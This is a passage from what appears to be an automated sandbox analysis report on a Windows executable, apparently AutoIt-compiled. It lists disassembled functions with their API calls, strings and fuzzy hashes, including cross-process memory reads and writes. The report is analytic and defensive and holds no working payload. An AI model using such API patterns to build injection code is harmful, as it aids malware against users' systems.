                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E95C6F
                                                      • MessageBeep.USER32(00000000), ref: 00E95C87
                                                      • KillTimer.USER32(?,0000040A), ref: 00E95CA3
                                                      • EndDialog.USER32(?,00000001), ref: 00E95CBD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 9ab8b95d11a9d2d9997b71e870566b232723145ec6def08616e668c1e864a5df
                                                      • Instruction ID: 4fb21e074c2f39818a1af8ddce7464b77dca05b420b4e0ac3676971025479e08
                                                      • Opcode Fuzzy Hash: 9ab8b95d11a9d2d9997b71e870566b232723145ec6def08616e668c1e864a5df
                                                      • Instruction Fuzzy Hash: 81014F31500B04AFEB215B21DE4EFE6B7B8AB00B05F041569F686B15E1DBB1A9898B90
                                                      Function 00E622A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00E622BE
                                                        • Part of subcall function 00E629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000), ref: 00E629DE
                                                        • Part of subcall function 00E629C8: GetLastError.KERNEL32(00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000,00000000), ref: 00E629F0
                                                      • _free.LIBCMT ref: 00E622D0
                                                      • _free.LIBCMT ref: 00E622E3
                                                      • _free.LIBCMT ref: 00E622F4
                                                      • _free.LIBCMT ref: 00E62305
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 296528e54d8c1967e0d6b8c3a2adb09c0f8945b959ea201706281011d6feff9a
                                                      • Instruction ID: d9652acc0369b4f2420d8ea10d1b2e0c492f76e4798864d42b4fb308f347e438
                                                      • Opcode Fuzzy Hash: 296528e54d8c1967e0d6b8c3a2adb09c0f8945b959ea201706281011d6feff9a
                                                      • Instruction Fuzzy Hash: 62F05E70A809698BC71AAF94BC019193BE6F7D87E2B21254EF510F22B1CB301811FFE5
                                                      Function 00E495C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 00E495D4
                                                      • StrokeAndFillPath.GDI32(?,?,00E871F7,00000000,?,?,?), ref: 00E495F0
                                                      • SelectObject.GDI32(?,00000000), ref: 00E49603
                                                      • DeleteObject.GDI32 ref: 00E49616
                                                      • StrokePath.GDI32(?), ref: 00E49631
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: 0cb1fc4fcf8c884a7e483299b96ebe07bbb09184f31ff23020da0ea558ca27dd
                                                      • Instruction ID: 4c0aec86679f1ad4ec57c48095ea13e5be7a7a147f334338e9cd621e928b64cd
                                                      • Opcode Fuzzy Hash: 0cb1fc4fcf8c884a7e483299b96ebe07bbb09184f31ff23020da0ea558ca27dd
                                                      • Instruction Fuzzy Hash: 7FF04931006208EFDB229F6AED1CBA53F61BB00326F248264F469750F1C735899AEF20
                                                      Function 00E60F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: __freea$_free
                                                      • String ID: a/p$am/pm
                                                      • API String ID: 3432400110-3206640213
                                                      • Opcode ID: 7536c33a64a6c2f783c111658deba90b5332ee8f323c430034b8508152932e25
                                                      • Instruction ID: 7d7a367efbb76f236e91fb98abe6729fe44f9a4c053731577430b66202a67c9e
                                                      • Opcode Fuzzy Hash: 7536c33a64a6c2f783c111658deba90b5332ee8f323c430034b8508152932e25
                                                      • Instruction Fuzzy Hash: 6ED115319C0245CACB268F68E8557FABBB1EF06384F2D6199E902BB751D3359D80CB91
                                                      Function 00E65AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: JO
                                                      • API String ID: 0-1663374661
                                                      • Opcode ID: 597d3ace61ac2d558d923426184aadfac71f637403d1e199dde5144e70a20005
                                                      • Instruction ID: 32dd0faa35f4dbaa66717770e0c277c0ee647a6e8b9f10a8e432600c771a16ed
                                                      • Opcode Fuzzy Hash: 597d3ace61ac2d558d923426184aadfac71f637403d1e199dde5144e70a20005
                                                      • Instruction Fuzzy Hash: 6751E376F8060AAFCB109FA4EC45FEEBBB8EF45394F14205AF405B7291D6319901DB61
                                                      Function 00E68A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00E68B6E
                                                      • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00E68B7A
                                                      • __dosmaperr.LIBCMT ref: 00E68B81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                      • String ID: .
                                                      • API String ID: 2434981716-3963672497
                                                      • Opcode ID: 50f2e132533699e3eedfc2f1c85e9775caded30a6531579d718408dec8372a5d
                                                      • Instruction ID: 79e762f5fd3bbfc317961ef307afa12b0eebac9ab8c170962b43da4ded82c79a
                                                      • Opcode Fuzzy Hash: 50f2e132533699e3eedfc2f1c85e9775caded30a6531579d718408dec8372a5d
                                                      • Instruction Fuzzy Hash: C541BFB4604045AFD7249F64ED84ABD3FE6EF85384F2863AAF894B7552DE31CC029750
                                                      Function 00E92716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E9B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E921D0,?,?,00000034,00000800,?,00000034), ref: 00E9B42D
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E92760
                                                        • Part of subcall function 00E9B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00E9B3F8
                                                        • Part of subcall function 00E9B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00E9B355
                                                        • Part of subcall function 00E9B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E92194,00000034,?,?,00001004,00000000,00000000), ref: 00E9B365
                                                        • Part of subcall function 00E9B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E92194,00000034,?,?,00001004,00000000,00000000), ref: 00E9B37B
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E927CD
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E9281A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: 0dd3a71b86f494886f95e4bcf14fdf9126a02c1d2681c046c36a99620ecd2dc2
                                                      • Instruction ID: ece77a47ed2271f662d23690aa25836dd56e82b2eb78138005dcaeb962cabf56
                                                      • Opcode Fuzzy Hash: 0dd3a71b86f494886f95e4bcf14fdf9126a02c1d2681c046c36a99620ecd2dc2
                                                      • Instruction Fuzzy Hash: A6411A72900218BFDF10DBA4DD45EEEBBB8AF09700F105099FA55B7181DB716E45CBA1
                                                      Function 00E6172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1001-13.exe,00000104), ref: 00E61769
                                                      • _free.LIBCMT ref: 00E61834
                                                      • _free.LIBCMT ref: 00E6183E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\1001-13.exe
                                                      • API String ID: 2506810119-678904928
                                                      • Opcode ID: b28233e40e44b4d2a06980f7d0dc4f8c81e210138f0fe99c95486aea5f4ee5b7
                                                      • Instruction ID: 091a6f1c05916c2e98f1b023e7569cfbb0b44fc77573052f07a8e259e2f25e77
                                                      • Opcode Fuzzy Hash: b28233e40e44b4d2a06980f7d0dc4f8c81e210138f0fe99c95486aea5f4ee5b7
                                                      • Instruction Fuzzy Hash: 8431B571A80208AFCB26DF99EC85D9EBBFCFB85390F1851AAF404E7211D6705E40DB90
                                                      Function 00E9C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E9C306
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00E9C34C
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F01990,011B5240), ref: 00E9C395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem
                                                      • String ID: 0
                                                      • API String ID: 135850232-4108050209
                                                      • Opcode ID: 21f96263765a5459b1c59ec26459d41d979617f56c7faa09a0d5808a063d5a90
                                                      • Instruction ID: 8112032cc9264528ca51c616cf32dce387ad85ae74f64241703a4f800791acfd
                                                      • Opcode Fuzzy Hash: 21f96263765a5459b1c59ec26459d41d979617f56c7faa09a0d5808a063d5a90
                                                      • Instruction Fuzzy Hash: 7941E6712043019FDB20EF25D844F5ABBE4EF85314F209A6DF9A5A72D1D770E904CB52
                                                      Function 00EC4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00ECCC08,00000000,?,?,?,?), ref: 00EC44AA
                                                      • GetWindowLongW.USER32 ref: 00EC44C7
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC44D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 207d0c2ea67d82d8397da77436ac9b5473b32218c01301d9269da8a1eff18f5d
                                                      • Instruction ID: 39d2b0dce6594c037affa4006e4fa0b81614f6049efb712ec024ff9655e8d4f3
                                                      • Opcode Fuzzy Hash: 207d0c2ea67d82d8397da77436ac9b5473b32218c01301d9269da8a1eff18f5d
                                                      • Instruction Fuzzy Hash: E6318D71210605AFDB258E38DD45FEA7BA9EB08328F206329F979A21D0D772AC529750
                                                      Function 00E96E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SysReAllocString.OLEAUT32(?,?), ref: 00E96EED
                                                      • VariantCopyInd.OLEAUT32(?,?), ref: 00E96F08
                                                      • VariantClear.OLEAUT32(?), ref: 00E96F12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyString
                                                      • String ID: *j
                                                      • API String ID: 2173805711-1845181700
                                                      • Opcode ID: 2575f4d64734cde73796df4da69eb22a230ce2b677ed86b6646ac83d283dd8ea
                                                      • Instruction ID: db4fb1b134863c3a8bc3e6d7da9093e311cfa49ffc8938e1088f86ec7ab11e64
                                                      • Opcode Fuzzy Hash: 2575f4d64734cde73796df4da69eb22a230ce2b677ed86b6646ac83d283dd8ea
                                                      • Instruction Fuzzy Hash: 4231AF72704205DFCF08AFA4E8559FD3BB6FF85304B1024AAF9036B2A1C734991ADB90
                                                      Function 00EB304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00EB335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00EB3077,?,?), ref: 00EB3378
                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EB307A
                                                      • _wcslen.LIBCMT ref: 00EB309B
                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00EB3106
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 946324512-2422070025
                                                      • Opcode ID: e3aa93fb4170230fb0dd7fd9eb020d3f30bd1510de5a46d550a6264c3d1e4430
                                                      • Instruction ID: cb5a3ad4c2e2373ed45b8bd708a645bc93b9e3b25c8cd5c94aefc2e8204fa25d
                                                      • Opcode Fuzzy Hash: e3aa93fb4170230fb0dd7fd9eb020d3f30bd1510de5a46d550a6264c3d1e4430
                                                      • Instruction Fuzzy Hash: 4D31D53A6042059FC720DF38C586EEB77E4EF54318F249059E915AB392DB72EE45C760
                                                      Function 00EC4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EC4705
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EC4713
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EC471A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: 50b7c7d6ac5a16a958be91fed56d0833da281e2d422311b32f86af5b3bcd715d
                                                      • Instruction ID: 057308bd2359179e25939ed618ba36403787e0f2e9a07be332431edae0e332ea
                                                      • Opcode Fuzzy Hash: 50b7c7d6ac5a16a958be91fed56d0833da281e2d422311b32f86af5b3bcd715d
                                                      • Instruction Fuzzy Hash: 7D215EF5600208AFEB10DF64DD91DAB37EDEB4A398B141059FA04AB391CB71EC52DA60
                                                      Function 00E995AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 176396367-2734436370
                                                      • Opcode ID: e6c0625305858d1605752865f5c4a6a21f446cd9aac1c191afe24a3bebf94187
                                                      • Instruction ID: 3ff0afe890fbb6d69c94a5562b2bfaf8facda9dfaa69f142e848a295828fca52
                                                      • Opcode Fuzzy Hash: e6c0625305858d1605752865f5c4a6a21f446cd9aac1c191afe24a3bebf94187
                                                      • Instruction Fuzzy Hash: 5E215B7210461166DB31AB2C9D03FBB73E89F91314F10642EFD49B7083EB61AD85C2E6
                                                      Function 00EC37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EC3840
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EC3850
                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EC3876
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: a038b087f8610e9abf2b9c289df2f24155efd194c04c16c043324e488d45f0be
                                                      • Instruction ID: 1a9d248d0182fd4c9feeb8893543ea55bd625249b8701c5fc6cd1f07e658f26f
                                                      • Opcode Fuzzy Hash: a038b087f8610e9abf2b9c289df2f24155efd194c04c16c043324e488d45f0be
                                                      • Instruction Fuzzy Hash: 2B21B372600118BFEF219F64DD45FBB376EEF89754F109129F904AB190C672DC528790
                                                      Function 00EA49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00EA4A08
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EA4A5C
                                                      • SetErrorMode.KERNEL32(00000000,?,?,00ECCC08), ref: 00EA4AD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
